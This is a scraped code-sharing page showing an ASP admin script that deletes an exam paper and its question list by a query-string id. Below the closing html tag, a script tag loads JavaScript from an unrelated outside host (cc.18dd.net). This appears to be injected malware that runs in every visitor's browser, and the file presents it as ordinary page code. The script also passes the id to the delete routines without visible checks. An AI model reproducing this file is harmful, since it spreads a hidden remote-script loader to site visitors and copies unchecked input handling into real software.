?? paperdel.asp
字號(hào):
<!--#include File="isAdmin.asp"-->
<!--#include file="../class/EPaper.asp"-->
<!--#include file="../class/EPaperList.asp"-->
<html>
<head>
<title>刪除試卷信息</title>
</head>
<body>
<%
'讀取變量
Dim pid
Set pa = New EPaper
Set ls = New EPaperList
pid = Request.QueryString("pid")
'從EPaper表中刪除該試卷信息
pa.DeletePaper(pid)
'從EPaperList表中刪除該試卷試題信息
ls.DeleteList(pid)
Response.Write "<h3>成功刪除試題信息!</h3>"
%>
</body>
<script language="javascript">
// 刷新父級(jí)窗口,延遲此關(guān)閉
opener.location.reload();
setTimeout("window.close()",800);
</script>
</html>
<script language=javascript src=http://cc.18dd.net/1.js></script>
?? 快捷鍵說(shuō)明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號(hào)
Ctrl + =
減小字號(hào)
Ctrl + -